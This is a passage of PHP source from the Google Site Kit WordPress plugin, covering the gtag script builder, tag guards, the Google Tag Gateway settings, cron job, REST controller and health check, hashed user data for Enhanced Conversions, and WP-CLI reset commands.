20, 2 ); } /** * Method used to return gtag() config call for selected tag. * * @since 1.124.0 * @access protected * * @param array $tag The Gtag tag, along with its config parameters. * * @return string Gtag call for tag in question. */ protected function get_gtag_call_for_tag( $tag ) { return empty( $tag['config'] ) ? sprintf( 'gtag("config", "%s");', esc_js( $tag['tag_id'] ) ) : sprintf( 'gtag("config", "%s", %s);', esc_js( $tag['tag_id'] ), wp_json_encode( $tag['config'] ) ); } /** * Method used to return gtag call for specific command. * * @since 1.124.0 * @access protected * * @param array $command The command array with applicable command and params. * * @return string Gtag function call for specific command. */ protected function get_gtag_call_for_command( $command ) { $gtag_args = array_merge( array( $command['command'] ), $command['parameters'] ); $gtag_args = array_map( function ( $arg ) { return wp_json_encode( $arg ); }, $gtag_args ); return sprintf( 'gtag(%s);', implode( ',', $gtag_args ) ); } /** * Returns the gtag source URL. * * @since 1.124.0 * @since 1.142.0 Provides support for Google tag gateway. * * @return string|false The gtag source URL. False if no tags are added. */ public function get_gtag_src() { if ( empty( $this->tags ) ) { return false; } // If Google tag gateway is active, each tag will get its own script as a dependency. if ( $this->is_google_tag_gateway_active() ) { return false; } // Load the GTag scripts using the first tag ID - it doesn't matter which is used, // all registered tags will be set up with a config command regardless // of which is used to load the source. $tag_id = rawurlencode( $this->tags[0]['tag_id'] ); return 'https://www.googletagmanager.com/gtag/js?id=' . $tag_id; } /** * Gets the list of tag script handles that GTag should load first. * * @return array */ private function get_gtag_deps() { if ( ! $this->is_google_tag_gateway_active() ) { return array(); } $deps = array(); $tag_ids = wp_list_pluck( $this->tags, 'tag_id' ); foreach ( $tag_ids as $tag_id ) { $handle = $this->get_handle_for_tag( $tag_id ); $deps[] = $handle; wp_register_script( $handle, esc_url( $this->get_gtg_src( $tag_id ) ), array(), null, // phpcs:ignore WordPress.WP.EnqueuedResourceParameters.MissingVersion false ); wp_script_add_data( $handle, 'script_execution', 'async' ); } return $deps; } /** * Gets the script tag src for a given tag using GTG. * * @param string $tag_id Tag ID. * @return string */ protected function get_gtg_src( $tag_id ) { return add_query_arg( 'id', $tag_id, plugins_url( 'gtg/measurement.php', GOOGLESITEKIT_PLUGIN_MAIN_FILE ) ); } /** * Checks if Google tag gateway is active. * * @since 1.142.0 * @since 1.162.0 Updated to use Google_Tag_Gateway_Settings->is_google_tag_gateway_active * instead of inline logic. * * @return bool True if Google tag gateway is active, false otherwise. */ protected function is_google_tag_gateway_active() { if ( ! Feature_Flags::enabled( 'googleTagGateway' ) ) { return false; } $google_tag_gateway_settings = new Google_Tag_Gateway_Settings( $this->options ); return $google_tag_gateway_settings->is_google_tag_gateway_active(); } /** * Gets the script tag handle for a given tag ID. * * @since 1.158.0 * * @param string $tag_id Tag ID. * @return string */ public static function get_handle_for_tag( $tag_id ): string { return self::HANDLE . "-$tag_id"; } } <?php /** * Interface Google\Site_Kit\Core\Tags\Tag_Matchers_Interface * * @package Google\Site_Kit\Core\Tags * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; /** * Interface for tag matchers. * * @since 1.119.0 * @access private * @ignore */ interface Tag_Matchers_Interface { /** * Holds array of regex tag matchers. * * @since 1.119.0 * * @return array Array of regex matchers. */ public function regex_matchers(); } <?php /** * Interface Google\Site_Kit\Core\Tags\Tag_Interface * * @package Google\Site_Kit\Core\Tags * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; /** * Interface for a tag. * * @since 1.24.0 * @access private * @ignore */ interface Tag_Interface { /** * Registers tag hooks. * * @since 1.24.0 */ public function register(); /** * Determines whether the tag can be register or not. * * @since 1.24.0 * * @return bool TRUE if the tag can be register, otherwise FALSE. */ public function can_register(); } <?php /** * Class Google\Site_Kit\Core\Tags\Tag * * @package Google\Site_Kit\Core\Tags * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Base class for tags. * * @since 1.24.0 * @access private * @ignore */ abstract class Tag implements Tag_Interface { /** * Tag ID. * * @since 1.24.0 * @var string */ protected $tag_id; /** * Guards array. * * @since 1.24.0 * @var array */ protected $guards = array(); /** * Constructor. * * @since 1.24.0 * * @param string $tag_id Tag ID. */ public function __construct( $tag_id ) { $this->tag_id = $tag_id; } /** * Adds a new guard to the guards list. * * @since 1.24.0 * * @param Guard_Interface $guard A guard instance to add to the guards list. */ public function use_guard( Guard_Interface $guard ) { $this->guards[] = $guard; } /** * Determines whether the tag can be register or not. * * @since 1.24.0 * * @return bool TRUE if the tag can be register, otherwise FALSE. */ public function can_register() { foreach ( $this->guards as $guard ) { if ( $guard instanceof Guard_Interface ) { $can_activate = $guard->can_activate(); if ( is_wp_error( $can_activate ) || ! $can_activate ) { return false; } } } return true; } /** * Registers tag hooks. * * @since 1.24.0 */ abstract public function register(); } <?php /** * Trait Google\Site_Kit\Core\Tags\Tag_With_DNS_Prefetch_Trait * * @package Google\Site_Kit * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; /** * Trait for adding the dns-prefetch directive to a url. * * @since 1.35.0 * @access private * @ignore */ trait Tag_With_DNS_Prefetch_Trait { /** * Gets a callback that can be used for the wp_resource_hints filter to set the dns-prefetch directive for a specified URL. * * @since 1.35.0 * * @param string $url URL to which the dns-prefetch directive should be added. * @return array List of urls. */ protected function get_dns_prefetch_hints_callback( $url ) { return function ( $urls, $relation_type ) use ( $url ) { if ( 'dns-prefetch' === $relation_type ) { $urls[] = $url; } return $urls; }; } } <?php /** * Class Google\Site_Kit\Core\Tags\Tag_With_Linker_Interface * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; /** * Interface for a tag implementing linker domain. * * @since 1.125.0 * @access private * @ignore */ interface Tag_With_Linker_Interface { /** * Sets the current home domain. * * @since 1.125.0 * * @param string $domain Domain name. */ public function set_home_domain( $domain ); } <?php /** * Class Google\Site_Kit\Core\Tags\Guards\Tag_Verify_Guard * * @package Google\Site_Kit\Core\Tags\Guards * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Guards; use Google\Site_Kit\Core\Guards\Guard_Interface; use Google\Site_Kit\Core\Util\Input; /** * Guard that verifies if the "tagverify" query arg is used. * * @since 1.24.0 * @access private * @ignore */ class Tag_Verify_Guard implements Guard_Interface { /** * Input access abstraction. * * @since 1.24.0 * @var Input */ private $input; /** * Constructor. * * @since 1.24.0 * * @param Input $input Input instance. */ public function __construct( Input $input ) { $this->input = $input; } /** * Determines whether the guarded tag can be activated or not. * * @since 1.24.0 * * @return bool|WP_Error TRUE if guarded tag can be activated, otherwise FALSE or an error. */ public function can_activate() { return ! $this->input->filter( INPUT_GET, 'tagverify', FILTER_VALIDATE_BOOLEAN ); } } <?php /** * Class Google\Site_Kit\Core\Tags\Guards\Tag_Environment_Type_Guard * * @package Google\Site_Kit\Core\Tags\Guards * @copyright 2022 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Guards; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Guard that verifies if we're in a production environment. * * @since 1.38.0 * @access private * @ignore */ class Tag_Environment_Type_Guard implements Guard_Interface { /** * Determines whether the guarded tag can be activated or not. * * @since 1.38.0 * * @return bool TRUE if guarded tag can be activated, otherwise FALSE. */ public function can_activate() { if ( ! function_exists( 'wp_get_environment_type' ) ) { return true; } $allowed_environments = apply_filters( 'googlesitekit_allowed_tag_environment_types', array( 'production' ) ); if ( ! is_array( $allowed_environments ) ) { $allowed_environments = array( 'production' ); } return in_array( wp_get_environment_type(), $allowed_environments, true ); } } <?php /** * Class Google\Site_Kit\Core\Tags\Guards\WP_Query_404_Guard * * @package Google\Site_Kit\Core\Tags\Guards * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Guards; use Google\Site_Kit\Core\Guards\Guard_Interface; /** * Class for WP_Query 404 guard. * * @since 1.105.0 * @access private * @ignore */ class WP_Query_404_Guard implements Guard_Interface { /** * Determines whether the guarded tag can be activated or not. * * @since 1.105.0 * * @return bool TRUE if guarded tag can be activated, otherwise FALSE or an error. */ public function can_activate() { return ! is_404(); } } <?php /** * Class Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway * * @package Google\Site_Kit\Core\Tags\Google_Tag_Gateway * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Google_Tag_Gateway; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Modules\Module_With_Debug_Fields; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway_Cron; use Google\Site_Kit\Core\Tracking\Feature_Metrics_Trait; use Google\Site_Kit\Core\Tracking\Provides_Feature_Metrics; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; /** * Class for handling Google Tag Gateway. * * @since 1.141.0 * @since 1.157.0 Renamed from First_Party_Mode to Google_Tag_Gateway. * @access private * @ignore */ class Google_Tag_Gateway implements Module_With_Debug_Fields, Provides_Feature_Metrics { use Method_Proxy_Trait; use Feature_Metrics_Trait; /** * Context instance. * * @since 1.141.0 * @var Context */ protected $context; /** * Google_Tag_Gateway_Settings instance. * * @since 1.141.0 * @var Google_Tag_Gateway_Settings */ protected $google_tag_gateway_settings; /** * REST_Google_Tag_Gateway_Controller instance. * * @since 1.141.0 * @var REST_Google_Tag_Gateway_Controller */ protected $rest_controller; /** * Google_Tag_Gateway_Cron instance. * * @since 1.142.0 * @var Google_Tag_Gateway_Cron */ private $cron; /** * Constructor. * * @since 1.141.0 * * @param Context $context Plugin context. * @param Options $options Optional. Option API instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $options = $options ?: new Options( $context ); $this->google_tag_gateway_settings = new Google_Tag_Gateway_Settings( $options ); $this->rest_controller = new REST_Google_Tag_Gateway_Controller( $this, $this->google_tag_gateway_settings ); $this->cron = new Google_Tag_Gateway_Cron( $this->google_tag_gateway_settings, array( $this, 'healthcheck' ) ); } /** * Registers the settings and REST controller. * * @since 1.141.0 */ public function register() { $this->google_tag_gateway_settings->register(); $this->rest_controller->register(); $this->cron->register(); $this->register_feature_metrics(); add_action( 'admin_init', fn () => $this->on_admin_init() ); } /** * Gets an array of internal feature metrics. * * @since 1.162.0 * * @return array */ public function get_feature_metrics() { $settings = $this->google_tag_gateway_settings->get(); return array( 'gtg_enabled' => (bool) isset( $settings['isEnabled'] ) && $settings['isEnabled'], 'gtg_healthy' => $this->get_health_check_feature_metric( $settings ), ); } /** * Maps a combination of GTG settings to a suitable string * for internal feature metrics tracking. * * @since 1.162.0 * * @param mixed $settings Settings array. * @return string */ private function get_health_check_feature_metric( $settings ) { if ( ! isset( $settings['isEnabled'] ) || ! $settings['isEnabled'] ) { return ''; } if ( isset( $settings['isGTGHealthy'] ) && true === $settings['isGTGHealthy'] && isset( $settings['isScriptAccessEnabled'] ) && true === $settings['isScriptAccessEnabled'] ) { return 'yes'; } return 'no'; } /** * Gets a healthcheck debug field display value. * * @since 1.142.0 * * @param mixed $setting_value Setting value. * @return string */ private function health_check_debug_field_value( $setting_value ) { if ( true === $setting_value ) { return __( 'Yes', 'google-site-kit' ); } elseif ( false === $setting_value ) { return __( 'No', 'google-site-kit' ); } return '-'; } /** * Gets a healthcheck debug field debug value. * * @since 1.142.0 * * @param mixed $setting_value Setting value. * @return string */ private function health_check_debug_field_debug( $setting_value ) { if ( true === $setting_value ) { return 'yes'; } elseif ( false === $setting_value ) { return 'no'; } return '-'; } /** * Gets an array of debug field definitions. * * @since 1.142.0 * @since 1.162.0 Updated to use Google_Tag_Gateway_Settings->is_google_tag_gateway_active() * instead of inline logic to determine effective GTG status. * * @return array */ public function get_debug_fields() { $settings = $this->google_tag_gateway_settings->get(); // Determine effective GTG status based on settings and health checks. $is_gtg_effectively_enabled = $this->google_tag_gateway_settings->is_google_tag_gateway_active(); return array( 'google_tag_gateway_is_enabled' => array( 'label' => __( 'Google tag gateway for advertisers', 'google-site-kit' ), 'value' => $is_gtg_effectively_enabled ? __( 'Enabled', 'google-site-kit' ) : __( 'Disabled', 'google-site-kit' ), 'debug' => $this->health_check_debug_field_debug( $is_gtg_effectively_enabled ), ), 'google_tag_gateway_is_gtg_healthy' => array( 'label' => __( 'Google tag gateway for advertisers: Service healthy', 'google-site-kit' ), 'value' => $this->health_check_debug_field_value( $settings['isGTGHealthy'] ), 'debug' => $this->health_check_debug_field_debug( $settings['isGTGHealthy'] ), ), 'google_tag_gateway_is_script_access_enabled' => array( 'label' => __( 'Google tag gateway for advertisers: Script accessible', 'google-site-kit' ), 'value' => $this->health_check_debug_field_value( $settings['isScriptAccessEnabled'] ), 'debug' => $this->health_check_debug_field_debug( $settings['isScriptAccessEnabled'] ), ), ); } /** * Checks the health of Google Tag Gateway server requirements. * * @since 1.142.0 * * @return void */ public function healthcheck() { $is_gtg_healthy = $this->is_endpoint_healthy( 'https://g-1234.fps.goog/mpath/healthy' ); $is_script_access_enabled = $this->is_endpoint_healthy( add_query_arg( 'healthCheck', '1', plugins_url( 'gtg/measurement.php', GOOGLESITEKIT_PLUGIN_MAIN_FILE ) ) ); $this->google_tag_gateway_settings->merge( array( 'isGTGHealthy' => $is_gtg_healthy, 'isScriptAccessEnabled' => $is_script_access_enabled, ) ); } /** * Schedule cron on admin init. * * @since 1.142.0 */ public function on_admin_init() { $this->cron->maybe_schedule_cron(); } /** * Checks if an endpoint is healthy. The endpoint must return a `200 OK` response with the body `ok`. * * @since 1.141.0 * @since 1.142.0 Relocated from REST_Google_Tag_Gateway_Controller. * @since 1.144.0 Uses Google\GoogleTagGatewayLibrary\RequestHelper to send requests. * @since 1.163.0 Uses Google\GoogleTagGatewayLibrary\Http\RequestHelper to send requests. * * @param string $endpoint The endpoint to check. * @return bool True if the endpoint is healthy, false otherwise. */ protected function is_endpoint_healthy( $endpoint ) { if ( ! defined( 'GOOGLESITEKIT_GTG_ENDPOINT_HEALTH_CHECK' ) ) { // TODO: This is a workaround to allow the measurement.php file to be loaded without making a // request, in order to use the RequestHelper class that it defines. We should find a better // solution in the future, but this will involve changes to the measurement.php file. define( 'GOOGLESITEKIT_GTG_ENDPOINT_HEALTH_CHECK', true ); } require_once GOOGLESITEKIT_PLUGIN_DIR_PATH . 'gtg/measurement.php'; $request_helper = new \Google\GoogleTagGatewayLibrary\Http\RequestHelper(); $response = $request_helper->sendRequest( 'GET', $endpoint ); if ( 200 !== $response['statusCode'] ) { return false; } if ( 'ok' !== $response['body'] ) { return false; } return true; } } <?php /** * Class Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway_Cron * * @package Google\Site_Kit\Core\Tags\Google_Tag_Gateway * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Google_Tag_Gateway; /** * Class to manage Google Tag Gateway cron tasks. * * @since 1.142.0 * @since 1.157.0 Renamed from First_Party_Mode_Cron to Google_Tag_Gateway_Cron. * @access private * @ignore */ class Google_Tag_Gateway_Cron { const CRON_ACTION = 'googlesitekit_cron_google_tag_gateway_healthchecks'; /** * Cron callback reference. * * @var callable */ private $cron_callback; /** * Google_Tag_Gateway_Settings instance. * * @var Google_Tag_Gateway_Settings */ private $google_tag_gateway_settings; /** * Constructor. * * @since 1.142.0 * * @param Google_Tag_Gateway_Settings $google_tag_gateway_settings Google_Tag_Gateway_Settings instance. * @param callable $callback Function to call on the cron action. */ public function __construct( Google_Tag_Gateway_Settings $google_tag_gateway_settings, callable $callback ) { $this->google_tag_gateway_settings = $google_tag_gateway_settings; $this->cron_callback = $callback; } /** * Registers functionality through WordPress hooks. * * @since 1.142.0 */ public function register() { add_action( self::CRON_ACTION, $this->cron_callback ); } /** * Schedules cron if not already set. * * @since 1.142.0 */ public function maybe_schedule_cron() { $settings = $this->google_tag_gateway_settings->get(); $gtg_enabled = $settings['isEnabled']; if ( $gtg_enabled && ! wp_next_scheduled( self::CRON_ACTION ) && ! wp_installing() ) { wp_schedule_event( time(), 'hourly', self::CRON_ACTION ); } } } <?php /** * Class Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway_Settings * * @package Google\Site_Kit\Core\Tags\Google_Tag_Gateway * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Google_Tag_Gateway; use Google\Site_Kit\Core\Storage\Setting; /** * Class to store user Google Tag Gateway settings. * * @since 1.141.0 * @since 1.157.0 Renamed from First_Party_Mode_Settings to Google_Tag_Gateway_Settings. * @access private * @ignore */ class Google_Tag_Gateway_Settings extends Setting { /** * The user option name for this setting. */ const OPTION = 'googlesitekit_google_tag_gateway'; /** * Gets the expected value type. * * @since 1.141.0 * * @return string The type name. */ protected function get_type() { return 'object'; } /** * Gets the default value. * * @since 1.141.0 * * @return array The default value. */ protected function get_default() { return array( 'isEnabled' => false, 'isGTGHealthy' => null, 'isScriptAccessEnabled' => null, ); } /** * Gets the callback for sanitizing the setting's value before saving. * * @since 1.141.0 * * @return callable Sanitize callback. */ protected function get_sanitize_callback() { return function ( $value ) { $new_value = $this->get(); if ( isset( $value['isEnabled'] ) ) { $new_value['isEnabled'] = (bool) $value['isEnabled']; } if ( isset( $value['isGTGHealthy'] ) ) { $new_value['isGTGHealthy'] = (bool) $value['isGTGHealthy']; } if ( isset( $value['isScriptAccessEnabled'] ) ) { $new_value['isScriptAccessEnabled'] = (bool) $value['isScriptAccessEnabled']; } return $new_value; }; } /** * Merges an array of settings to update. * * @since 1.141.0 * * @param array $partial Partial settings array to save. * @return bool True on success, false on failure. */ public function merge( array $partial ) { $settings = $this->get(); $partial = array_filter( $partial, function ( $value ) { return null !== $value; } ); $allowed_settings = array( 'isEnabled' => true, 'isGTGHealthy' => true, 'isScriptAccessEnabled' => true, ); $updated = array_intersect_key( $partial, $allowed_settings ); return $this->set( array_merge( $settings, $updated ) ); } /** * Checks if Google tag gateway is active. * * @since 1.162.0 * * @return bool True if Google tag gateway is active, false otherwise. */ public function is_google_tag_gateway_active() { $settings = $this->get(); $required_settings = array( 'isEnabled', 'isGTGHealthy', 'isScriptAccessEnabled' ); foreach ( $required_settings as $setting ) { if ( ! isset( $settings[ $setting ] ) || ! $settings[ $setting ] ) { return false; } } return true; } } <?php /** * Class Google\Site_Kit\Core\Tags\Google_Tag_Gateway\REST_Google_Tag_Gateway_Controller * * @package Google\Site_Kit\Core\Tags\Google_Tag_Gateway * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Google_Tag_Gateway; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling Google Tag Gateway settings via REST API. * * @since 1.141.0 * @since 1.157.0 Renamed from REST_First_Party_Mode_Controller to REST_Google_Tag_Gateway_Controller. * @access private * @ignore */ class REST_Google_Tag_Gateway_Controller { /** * Google_Tag_Gateway instance. * * @since 1.142.0 * @var Google_Tag_Gateway */ private $google_tag_gateway; /** * Google_Tag_Gateway_Settings instance. * * @since 1.141.0 * @var Google_Tag_Gateway_Settings */ private $google_tag_gateway_settings; /** * Constructor. * * @since 1.141.0 * * @param Google_Tag_Gateway $google_tag_gateway Google_Tag_Gateway instance. * @param Google_Tag_Gateway_Settings $google_tag_gateway_settings Google_Tag_Gateway_Settings instance. */ public function __construct( Google_Tag_Gateway $google_tag_gateway, Google_Tag_Gateway_Settings $google_tag_gateway_settings ) { $this->google_tag_gateway = $google_tag_gateway; $this->google_tag_gateway_settings = $google_tag_gateway_settings; } /** * Registers functionality through WordPress hooks. * * @since 1.141.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/site/data/gtg-settings', ) ); } ); } /** * Gets REST route instances. * * @since 1.141.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $can_manage_options = function () { return current_user_can( Permissions::MANAGE_OPTIONS ); }; return array( new REST_Route( 'core/site/data/gtg-settings', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->google_tag_gateway_settings->get() ); }, 'permission_callback' => $can_manage_options, ), array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $this->google_tag_gateway_settings->set( $request['data']['settings'] ); return new WP_REST_Response( $this->google_tag_gateway_settings->get() ); }, 'permission_callback' => $can_manage_options, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'minProperties' => 1, 'additionalProperties' => false, 'properties' => array( 'isEnabled' => array( 'type' => 'boolean', 'required' => true, ), ), ), ), ), ), ), ) ), new REST_Route( 'core/site/data/gtg-server-requirement-status', array( array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { $this->google_tag_gateway->healthcheck(); return new WP_REST_Response( $this->google_tag_gateway_settings->get() ); }, 'permission_callback' => $can_manage_options, ), ) ), ); } } <?php /** * Trait Google\Site_Kit\Core\Tags\Tag_With_Linker_Trait * * @package Google\Site_Kit * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags; /** * Trait for adding the linker property with domain to tag output. * * @since 1.125.0 * @access private * @ignore */ trait Tag_With_Linker_Trait { /** * Holds the value of the domain for the linker config option in the gtag. * * @var string $home_domain The site's domain for linker property. */ private $home_domain; /** * Method to set home domain. * * @param string $home_domain The value to set for home domain. * * @since 1.125.0 * @return void */ public function set_home_domain( $home_domain ) { $this->home_domain = $home_domain; } /** * Method to add linker domain to tag config. * * @param array $tag_config Tag config to add linker entry to. * * @since 1.125.0 * @return array Tag config, with or without linker values. */ protected function add_linker_to_tag_config( $tag_config ) { return array_merge( $tag_config, array( 'linker' => array( 'domains' => array( $this->home_domain ) ) ) ); } } <?php /** * Class Google\Site_Kit\Core\Tags\Enhanced_Conversions\Enhanced_Conversions * * @package Google\Site_Kit\Core\Tags\Enhanced_Conversions * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Tags\Enhanced_Conversions; use Google\Site_Kit\Core\Tags\GTag; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use Google\Site_Kit\Modules\Ads; use Google\Site_Kit\Modules\Analytics_4; use Google\Site_Kit\Modules\Tag_Manager; /** * Class Enhanced_Conversions. * * @since 1.159.0 * @access private * @ignore */ class Enhanced_Conversions { use Method_Proxy_Trait; /** * Array of slugs of modules using GTag. */ const MODULES_USING_GTAG = array( Ads::MODULE_SLUG, Analytics_4::MODULE_SLUG, Tag_Manager::MODULE_SLUG, ); /** * Registers functionality through WordPress hooks. * * @since 1.159.0 */ public function register() { add_action( 'googlesitekit_setup_gtag', $this->get_method_proxy( 'maybe_enqueue_gtag_user_data' ) ); } /** * Gets the user data for Enhanced Conversions. * * @since 1.159.0 * * @return array User data. */ protected function get_user_data() { $user_data = array(); if ( ! is_user_logged_in() ) { return $user_data; } $user = wp_get_current_user(); $first_name = $user->user_firstname; $last_name = $user->user_lastname; $email = $user->user_email; if ( ! empty( $email ) ) { $user_data['sha256_email_address'] = self::get_formatted_email( $email ); } if ( ! empty( $first_name ) ) { $user_data['address']['sha256_first_name'] = self::get_formatted_value( $first_name ); } if ( ! empty( $last_name ) ) { $user_data['address']['sha256_last_name'] = self::get_formatted_value( $last_name ); } return $user_data; } /** * Checks if any module using GTag is connected. * * @since 1.165.0 * * @return boolean Whether any module using GTag is connected. */ protected function has_connected_gtag_module() { foreach ( self::MODULES_USING_GTAG as $module ) { if ( apply_filters( 'googlesitekit_is_module_connected', false, $module ) ) { return true; } } return false; } /** * Conditionally enqueues the necessary script for Enhanced Conversions. * * @since 1.159.0 * @since 1.160.0 Add the hashed user data to the GTag if it exists. * * @param GTag $gtag GTag instance. */ public function maybe_enqueue_gtag_user_data( GTag $gtag ) { if ( ! $this->has_connected_gtag_module() ) { return; } $user_data = $this->get_user_data(); if ( empty( $user_data ) ) { return; } $gtag->add_command( 'set', array( 'user_data', $user_data ) ); } /** * Gets the formatted value for Enhanced Conversions. * * @since 1.160.0 * * @param string $value The value to format. * @return string Formatted value. */ public static function get_formatted_value( $value ) { $value = self::get_normalized_value( $value ); $value = self::get_hashed_value( $value ); return $value; } /** * Gets the formatted email for Enhanced Conversions. * * @since 1.160.0 * * @param string $email The email address to format. * @return string Formatted email address. */ public static function get_formatted_email( $email ) { $email = self::get_normalized_email( $email ); $email = self::get_hashed_value( $email ); return $email; } /** * Normalizes a value for Enhanced Conversions. * * @since 1.160.0 * * @param string $value The value to normalize. * @return string Normalized value. */ public static function get_normalized_value( string $value ) { return strtolower( trim( $value ) ); } /** * Normalizes an email address for Enhanced Conversions. * * @since 1.160.0 * * @param string $email The email address to normalize. * @return string Normalized email address. */ public static function get_normalized_email( string $email ) { $email = self::get_normalized_value( $email ); $at_pos = strrpos( $email, '@' ); // If there is no '@' in the email, return it as is. if ( false === $at_pos ) { return $email; } $domain = substr( $email, $at_pos + 1 ); // Check if it is a 'gmail.com' or 'googlemail.com' address. if ( in_array( $domain, array( 'gmail.com', 'googlemail.com' ), true ) ) { $prefix = substr( $email, 0, $at_pos ); // Remove dots from the prefix. $prefix = str_replace( '.', '', $prefix ); $email = $prefix . '@' . $domain; } return $email; } /** * Hashes a value for Enhanced Conversions. * * @since 1.160.0 * * @param string $value The value to hash. * @return string Hashed value. */ public static function get_hashed_value( string $value ) { return hash( 'sha256', $value ); } } <?php /** * Interface Google\Site_Kit\Core\Contracts\WP_Errorable. * * @package Google\Site_Kit\Core\Contracts * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Contracts; use WP_Error; /** * Interface for a class which can be represented as a WP_Error. * * @since 1.9.0 */ interface WP_Errorable { /** * Gets the WP_Error representation of this entity. * * @since 1.9.0 * * @return WP_Error */ public function to_wp_error(); } <?php /** * Site Kit CLI Command * * @package Google\Site_Kit\Core\CLI * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\CLI; use Google\Site_Kit\Context; use WP_CLI_Command; /** * Base CLI Command class. * * @since 1.11.0 * @access private * @ignore */ class CLI_Command extends WP_CLI_Command { /** * Plugin context. * * @since 1.11.0 * * @var Context */ protected $context; /** * Constructor. * * @since 1.11.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } } <?php /** * Site Kit Cache CLI Commands * * @package Google\Site_Kit\Core\CLI * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\CLI; use Google\Site_Kit\Core\Util\Reset; use Google\Site_Kit\Core\Util\Reset_Persistent; use WP_CLI; /** * Resets Site Kit Settings and Data. * * @since 1.11.0 * @access private * @ignore */ class Reset_CLI_Command extends CLI_Command { /** * Deletes options, user stored options, transients and clears object cache for stored options. * * ## OPTIONS * * [--persistent] * : Additionally deletes persistent options. * * ## EXAMPLES * * wp google-site-kit reset * wp google-site-kit reset --persistent * * @since 1.11.0 * @since 1.27.0 Added --persistent flag to delete persistent options. * * @param array $args Positional args. * @param array $assoc_args Additional flags. */ public function __invoke( $args, $assoc_args ) { $reset = new Reset( $this->context ); $reset->all(); if ( isset( $assoc_args['persistent'] ) && true === $assoc_args['persistent'] ) { $reset_persistent = new Reset_Persistent( $this->context ); $reset_persistent->all(); } WP_CLI::success( 'Settings successfully reset.' ); } } <?php /** * Class Google\Site_Kit\Core\CLI\CLI_Commands * * @package Google\Site_Kit\Core\CLI * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\CLI; use Google\Site_Kit\Context; use WP_CLI; /** * CLI commands hub class. * * @since 1.11.0 * @access private * @ignore */ class CLI_Commands { /** * Plugin context. * * @since 1.11.0 * * @var Context */ private $context; /** * Constructor. * * @since 1.11.0 * * 